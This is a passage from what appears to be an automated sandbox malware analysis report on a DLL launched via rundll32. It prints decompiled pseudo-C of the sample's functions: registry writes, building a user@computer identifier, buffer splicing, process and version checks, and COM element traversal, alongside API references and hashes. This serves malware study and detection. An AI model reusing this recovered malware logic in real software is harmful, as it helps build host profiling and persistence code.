                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 047B584B
                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 047B5861
                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 047B5877
                                            • Part of subcall function 047B7B01: memset.NTDLL ref: 047B7B80
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$AllocateHandleHeapModulememset
                                          • String ID:
                                          • API String ID: 1886625739-0
                                          • Opcode ID: dffd09a79d1f89d42dbfbdf839b26ff8bd6a8fada17e24c52bff99e464b2d547
                                          • Instruction ID: 567eb19cdff29657c752144c28c266346ef1d1b6435fabcb74775f2b53147148
                                          • Opcode Fuzzy Hash: dffd09a79d1f89d42dbfbdf839b26ff8bd6a8fada17e24c52bff99e464b2d547
                                          • Instruction Fuzzy Hash: 93211EB160064BAFEB21DFA9C944FDA77ECEF443187058425E989DB311EA74E9058BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047BA642, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 173stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E047BA642(void* __ecx, char* _a8, int _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				void _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				intOrPtr _t65;
				char _t68;
				intOrPtr _t72;
				void* _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t88;
				void* _t96;
				void* _t97;
				int _t102;
				signed int* _t104;
				intOrPtr* _t105;
				void* _t106;

				_t97 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t102 = _a16;
				if(_t102 == 0) {
					__imp__( &_v284,  *0x47bd33c);
					_t96 = 0x80000002;
					L6:
					_t60 = E047BA5E9(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t105 = _a24;
					if(E047B621D(_t97, _t105, _t96, _t60) != 0) {
						L27:
						E047B147E(_a8);
						goto L29;
					}
					_t65 =  *0x47bd2a4; // 0x24fa5a8
					_t16 = _t65 + 0x47be8de; // 0x65696c43
					_t68 = E047BA5E9(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t105 + 0x14; // 0x102
						_t33 = _t105 + 0x10; // 0x3d047bc0
						if(E047B4C9A( *_t33, _t96, _a8,  *0x47bd334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
							_t72 =  *0x47bd2a4; // 0x24fa5a8
							if(_t102 == 0) {
								_t35 = _t72 + 0x47bea54; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0x47bea4f; // 0x55434b48
								_t73 = _t34;
							}
							if(E047B30FC( &_a24, _t73,  *0x47bd334,  *0x47bd338,  &_a24,  &_a16) == 0) {
								if(_t102 == 0) {
									_t75 =  *0x47bd2a4; // 0x24fa5a8
									_t44 = _t75 + 0x47be856; // 0x74666f53
									_t78 = E047BA5E9(0, _t44);
									_t103 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t105 + 0x10; // 0x3d047bc0
										E047B1BC1( *_t47, _t96, _a8,  *0x47bd338, _a24);
										_t49 = _t105 + 0x10; // 0x3d047bc0
										E047B1BC1( *_t49, _t96, _t103,  *0x47bd330, _a16);
										E047B147E(_t103);
									}
								} else {
									_t40 = _t105 + 0x10; // 0x3d047bc0
									E047B1BC1( *_t40, _t96, _a8,  *0x47bd338, _a24);
									_t43 = _t105 + 0x10; // 0x3d047bc0
									E047B1BC1( *_t43, _t96, _a8,  *0x47bd330, _a16);
								}
								if( *_t105 != 0) {
									E047B147E(_a24);
								} else {
									 *_t105 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t105 + 0x10; // 0x3d047bc0
					if(E047B74B9( *_t21, _t96, _a8, _t68,  &_v16,  &_v12) == 0) {
						_t104 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t104 =  *_t104 & 0x00000000;
							_t26 = _t105 + 0x10; // 0x3d047bc0
							E047B4C9A( *_t26, _t96, _a8, _a24, _t104);
						}
						E047B147E(_t104);
						_t102 = _a16;
					}
					E047B147E(_a24);
					goto L14;
				}
				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					memcpy( &_v284, _a8, _t102);
					__imp__(_t106 + _t102 - 0x117,  *0x47bd33c);
					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
					_t96 = 0x80000003;
					goto L6;
				}
			}























                                          0x047ba642
                                          0x047ba64b
                                          0x047ba652
                                          0x047ba657
                                          0x047ba6c6
                                          0x047ba6cc
                                          0x047ba6d1
                                          0x047ba6da
                                          0x047ba6df
                                          0x047ba6e4
                                          0x047ba858
                                          0x047ba85f
                                          0x047ba85f
                                          0x047ba864
                                          0x047ba866
                                          0x047ba866
                                          0x047ba86f
                                          0x047ba86f
                                          0x047ba6ea
                                          0x047ba6f6
                                          0x047ba84e
                                          0x047ba851
                                          0x00000000
                                          0x047ba851
                                          0x047ba6fc
                                          0x047ba701
                                          0x047ba70a
                                          0x047ba70f
                                          0x047ba714
                                          0x047ba75e
                                          0x047ba75e
                                          0x047ba771
                                          0x047ba77b
                                          0x047ba781
                                          0x047ba788
                                          0x047ba792
                                          0x047ba792
                                          0x047ba78a
                                          0x047ba78a
                                          0x047ba78a
                                          0x047ba78a
                                          0x047ba7b4
                                          0x047ba7bc
                                          0x047ba7ea
                                          0x047ba7ef
                                          0x047ba7f8
                                          0x047ba7fd
                                          0x047ba801
                                          0x047ba833
                                          0x047ba803
                                          0x047ba810
                                          0x047ba813
                                          0x047ba823
                                          0x047ba826
                                          0x047ba82c
                                          0x047ba82c
                                          0x047ba7be
                                          0x047ba7cb
                                          0x047ba7ce
                                          0x047ba7e0
                                          0x047ba7e3
                                          0x047ba7e3
                                          0x047ba83d
                                          0x047ba849
                                          0x047ba83f
                                          0x047ba842
                                          0x047ba842
                                          0x047ba83d
                                          0x047ba7b4
                                          0x00000000
                                          0x047ba77b
                                          0x047ba723
                                          0x047ba72d
                                          0x047ba72f
                                          0x047ba734
                                          0x047ba738
                                          0x047ba73a
                                          0x047ba745
                                          0x047ba748
                                          0x047ba748
                                          0x047ba74e
                                          0x047ba753
                                          0x047ba753
                                          0x047ba759
                                          0x00000000
                                          0x047ba759
                                          0x047ba65c
                                          0x00000000
                                          0x047ba683
                                          0x047ba68e
                                          0x047ba6a4
                                          0x047ba6aa
                                          0x047ba6b2
                                          0x00000000
                                          0x047ba6b2

                                          APIs
                                          • StrChrA.SHLWAPI(047B553C,0000005F,00000000,00000000,00000104), ref: 047BA675
                                          • memcpy.NTDLL(?,047B553C,?), ref: 047BA68E
                                          • lstrcpy.KERNEL32(?), ref: 047BA6A4
                                            • Part of subcall function 047BA5E9: lstrlen.KERNEL32(?,00000000,047BD330,00000001,047B937A,047BD00C,047BD00C,00000000,00000005,00000000,00000000,?,?,?,047B207E,?), ref: 047BA5F2
                                            • Part of subcall function 047BA5E9: mbstowcs.NTDLL ref: 047BA619
                                            • Part of subcall function 047BA5E9: memset.NTDLL ref: 047BA62B
                                            • Part of subcall function 047B1BC1: lstrlenW.KERNEL32(047B553C,?,?,047BA818,3D047BC0,80000002,047B553C,047B9642,74666F53,4D4C4B48,047B9642,?,3D047BC0,80000002,047B553C,?), ref: 047B1BE1
                                            • Part of subcall function 047B147E: HeapFree.KERNEL32(00000000,00000000,047B1D11,00000000,?,?,-00000008), ref: 047B148A
                                          • lstrcpy.KERNEL32(?,00000000), ref: 047BA6C6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemcpymemset
                                          • String ID: \
                                          • API String ID: 2598994505-2967466578
                                          • Opcode ID: 12ef03805018a798820d00a4ea4d47bd0554dc5d9d7b633f21ef237385cd6909
                                          • Instruction ID: 37b30408e8f762e9fca66ed3f46d6bfa2818a0348e5489042a96aea0fc8197c8
                                          • Opcode Fuzzy Hash: 12ef03805018a798820d00a4ea4d47bd0554dc5d9d7b633f21ef237385cd6909
                                          • Instruction Fuzzy Hash: D8518D7250020AEFEF22AFA0DD44FDA3BB9EF04354F008528F99596621E739E915DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B614A, Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E047B614A() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E047B58BE(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E047B147E(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x47b5210
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















                                          0x047b6158
                                          0x047b615b
                                          0x047b615e
                                          0x047b6164
                                          0x047b6169
                                          0x047b616f
                                          0x047b6177
                                          0x047b617a
                                          0x047b6180
                                          0x047b6185
                                          0x047b6192
                                          0x047b619f
                                          0x047b61a3
                                          0x047b61a5
                                          0x047b61a9
                                          0x047b61ac
                                          0x047b61bc
                                          0x047b620f
                                          0x047b6210
                                          0x047b61be
                                          0x047b61c3
                                          0x047b61c4
                                          0x047b61c9
                                          0x047b61cc
                                          0x047b61df
                                          0x00000000
                                          0x047b61e1
                                          0x047b61e4
                                          0x047b61e9
                                          0x047b61f7
                                          0x047b61fa
                                          0x047b6200
                                          0x047b6205
                                          0x00000000
                                          0x047b6207
                                          0x047b6207
                                          0x047b620a
                                          0x047b620a
                                          0x047b6205
                                          0x047b61df
                                          0x047b6215
                                          0x047b6216
                                          0x047b6185
                                          0x047b621c

                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,047B520E), ref: 047B615E
                                          • GetComputerNameW.KERNEL32(00000000,047B520E), ref: 047B617A
                                            • Part of subcall function 047B58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,047B1C51), ref: 047B58CA
                                          • GetUserNameW.ADVAPI32(00000000,047B520E), ref: 047B61B4
                                          • GetComputerNameW.KERNEL32(047B520E,?), ref: 047B61D7
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,047B520E,00000000,047B5210,00000000,00000000,?,?,047B520E), ref: 047B61FA
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                          • String ID:
                                          • API String ID: 3850880919-0
                                          • Opcode ID: 403fef259996c584927f7d0cec4466a0326eed5e978785f4074704e10d8772f1
                                          • Instruction ID: 78dca02ab55d3f0e0fdeccde565d8337880b45a8cdc64c1befb27b87ec06e915
                                          • Opcode Fuzzy Hash: 403fef259996c584927f7d0cec4466a0326eed5e978785f4074704e10d8772f1
                                          • Instruction Fuzzy Hash: 9F21EFB5900108FFDB11DFE5DA84EEEBBBCEF44304B50446AE645E7200D634AB44DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B62CD, Relevance: 7.6, APIs: 5, Instructions: 75memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E047B62CD(void* __eax, void* _a4, intOrPtr _a8, void* _a12, int _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t36;
				void* _t41;
				char* _t42;
				void* _t44;
				void* _t49;
				void* _t50;
				int _t51;
				int _t54;
				void* _t55;

				_t49 = _a4;
				_t55 = __eax;
				_v12 = 0xb;
				if(_t49 != 0 && __eax != 0) {
					_t5 = _t55 - 1; // -1
					_t42 = _t49 + _t5;
					_t28 =  *_t42;
					_v5 = _t28;
					 *_t42 = 0;
					__imp__(_a8, _t41);
					_v16 = _t28;
					_t50 =  *0x47bd114(_t49, _a8);
					if(_t50 != 0) {
						 *_t42 = _v5;
						_t44 = RtlAllocateHeap( *0x47bd238, 0, _a16 + __eax);
						if(_t44 == 0) {
							_v12 = 8;
						} else {
							_t51 = _t50 - _a4;
							memcpy(_t44, _a4, _t51);
							_t36 = memcpy(_t44 + _t51, _a12, _a16);
							_t45 = _v16;
							_t54 = _a16;
							memcpy(_t36 + _t54, _t51 + _v16 + _a4, _t55 - _t51 - _t45);
							 *_a20 = _t44;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t55 - _v16 + _t54;
						}
					}
				}
				return _v12;
			}
















                                          0x047b62d5
                                          0x047b62d8
                                          0x047b62da
                                          0x047b62e3
                                          0x047b62f5
                                          0x047b62f5
                                          0x047b62f9
                                          0x047b62fb
                                          0x047b62fe
                                          0x047b6301
                                          0x047b630a
                                          0x047b6314
                                          0x047b6318
                                          0x047b631d
                                          0x047b6333
                                          0x047b6337
                                          0x047b6388
                                          0x047b6339
                                          0x047b6339
                                          0x047b6341
                                          0x047b6350
                                          0x047b6355
                                          0x047b6365
                                          0x047b636b
                                          0x047b6376
                                          0x047b6380
                                          0x047b6384
                                          0x047b6384
                                          0x047b6337
                                          0x047b638f
                                          0x047b6396

                                          APIs
                                          • lstrlen.KERNEL32(7519F710,?,00000000,?,7519F710), ref: 047B6301
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 047B632D
                                          • memcpy.NTDLL(00000000,0000000B,0000000B), ref: 047B6341
                                          • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 047B6350
                                          • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 047B636B
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 1819133394-0
                                          • Opcode ID: 14cd5024f1dff5b0b0ffbfe77ccee6d92fc2e65f1b5c0bc27914217cec503c8d
                                          • Instruction ID: 7310c263ed82b10fa7e3cd7a5d33a8fa9862e39ffdb795294c77f62131de0635
                                          • Opcode Fuzzy Hash: 14cd5024f1dff5b0b0ffbfe77ccee6d92fc2e65f1b5c0bc27914217cec503c8d
                                          • Instruction Fuzzy Hash: F4218C76900209AFDB129FA8C848BDEBFB9EF85704F058059ED84AB305D735E915CBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B9FE7, Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E047B9FE7(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E047B6B6E(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E047BA96C(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0x47bd12c() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                                          0x047b9fe7
                                          0x047b9ff4
                                          0x047b9ff6
                                          0x047ba059
                                          0x00000000
                                          0x047ba059
                                          0x047ba00e
                                          0x047ba015
                                          0x047ba021
                                          0x047ba026
                                          0x047ba028
                                          0x047ba02a
                                          0x047ba02c
                                          0x047ba02e
                                          0x047ba030
                                          0x047ba03c
                                          0x047ba04c
                                          0x00000000
                                          0x047ba03e
                                          0x047ba03e
                                          0x047ba045
                                          0x047ba052
                                          0x047ba052
                                          0x047ba052
                                          0x047ba045
                                          0x047ba03c
                                          0x047ba057
                                          0x00000000
                                          0x00000000
                                          0x047ba05d

                                          APIs
                                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,047B66AF,?,?,00000000,00000000), ref: 047BA021
                                          • ResetEvent.KERNEL32(?), ref: 047BA026
                                          • GetLastError.KERNEL32 ref: 047BA03E
                                          • GetLastError.KERNEL32(?,?,00000102,047B66AF,?,?,00000000,00000000), ref: 047BA059
                                            • Part of subcall function 047B6B6E: lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,047BA006,?,?,?,?,00000102,047B66AF,?,?,00000000), ref: 047B6B7A
                                            • Part of subcall function 047B6B6E: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,047BA006,?,?,?,?,00000102,047B66AF,?), ref: 047B6BD8
                                            • Part of subcall function 047B6B6E: lstrcpy.KERNEL32(00000000,00000000), ref: 047B6BE8
                                          • SetEvent.KERNEL32(?), ref: 047BA04C
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1449191863-0
                                          • Opcode ID: 21ec39bc5c0472c27c7c9f53c0afdab9691177da520c8ea94b74b1e9b3d5c3bb
                                          • Instruction ID: 8b04b40d83792985393058b6d979a284632fb367d148966189766e595040d8b7
                                          • Opcode Fuzzy Hash: 21ec39bc5c0472c27c7c9f53c0afdab9691177da520c8ea94b74b1e9b3d5c3bb
                                          • Instruction Fuzzy Hash: 15014B31104A00ABEB317A61DC84FDBB7A9EF44764F118E28F691D12E0E725F815AAE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B6A7F, Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E047B6A7F(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x47bd26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x47bd25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x47bd258 = _t6;
					 *0x47bd264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x47bd254 = _t7;
					if(_t7 == 0) {
						 *0x47bd254 =  *0x47bd254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









                                          0x047b6a87
                                          0x047b6a8d
                                          0x047b6a94
                                          0x00000000
                                          0x047b6aee
                                          0x047b6a96
                                          0x047b6a9e
                                          0x047b6aab
                                          0x047b6aab
                                          0x047b6aeb
                                          0x00000000
                                          0x047b6aeb
                                          0x047b6aad
                                          0x047b6aad
                                          0x047b6ab2
                                          0x047b6ac4
                                          0x047b6ac9
                                          0x047b6acf
                                          0x047b6ad5
                                          0x047b6adc
                                          0x047b6ade
                                          0x047b6ade
                                          0x00000000
                                          0x047b6ae5
                                          0x047b6aa7
                                          0x00000000
                                          0x00000000
                                          0x047b6aa9
                                          0x00000000

                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,047B90D2,?), ref: 047B6A87
                                          • GetVersion.KERNEL32 ref: 047B6A96
                                          • GetCurrentProcessId.KERNEL32 ref: 047B6AB2
                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 047B6ACF
                                          • GetLastError.KERNEL32 ref: 047B6AEE
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                          • String ID:
                                          • API String ID: 2270775618-0
                                          • Opcode ID: 231e20be7158bebd4547e153d7892fffad326651f60ceb6d80e0372c5a5bf910
                                          • Instruction ID: 4bdde2876d83401fef4a2ec5294600a3f30203c662e7ab542ba153319ad8eb18
                                          • Opcode Fuzzy Hash: 231e20be7158bebd4547e153d7892fffad326651f60ceb6d80e0372c5a5bf910
                                          • Instruction Fuzzy Hash: F4F08C746407429FEF318F65AE0AFD53B60E744705F10C81AE682CA2C0E678E851CBD6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047BA060, Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SysAllocString.OLEAUT32(?), ref: 047BA09B
                                          • SysFreeString.OLEAUT32(00000000), ref: 047BA180
                                            • Part of subcall function 047B91B5: SysAllocString.OLEAUT32(047BC298), ref: 047B9205
                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 047BA1D3
                                          • SysFreeString.OLEAUT32(00000000), ref: 047BA1E2
                                            • Part of subcall function 047BA872: Sleep.KERNEL32(000001F4), ref: 047BA8BA
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree$ArrayDestroySafeSleep
                                          • String ID:
                                          • API String ID: 3193056040-0
                                          • Opcode ID: 8d2cb4d36b03a521f9a175445eb701e7d9f309873b0e7c4e5fb92795d214a5e0
                                          • Instruction ID: e0b5adedacadc3ba2a98ed56c7f9c56efe4221c11dd97fae7fa9c6fb4b2770b6
                                          • Opcode Fuzzy Hash: 8d2cb4d36b03a521f9a175445eb701e7d9f309873b0e7c4e5fb92795d214a5e0
                                          • Instruction Fuzzy Hash: 21515075500609AFDB41DFA8D848BDEB7B6FF88740B148829E545EB310EB35ED45CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B91B5, Relevance: 6.2, APIs: 4, Instructions: 154memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 46%
                                          			E047B91B5(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x47bd2a4; // 0x24fa5a8
					_t5 = _t103 + 0x47be038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x47bc298);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x47bd2a4; // 0x24fa5a8
												_t28 = _t109 + 0x47be0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x47bd2a4; // 0x24fa5a8
														_t33 = _t79 + 0x47be078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
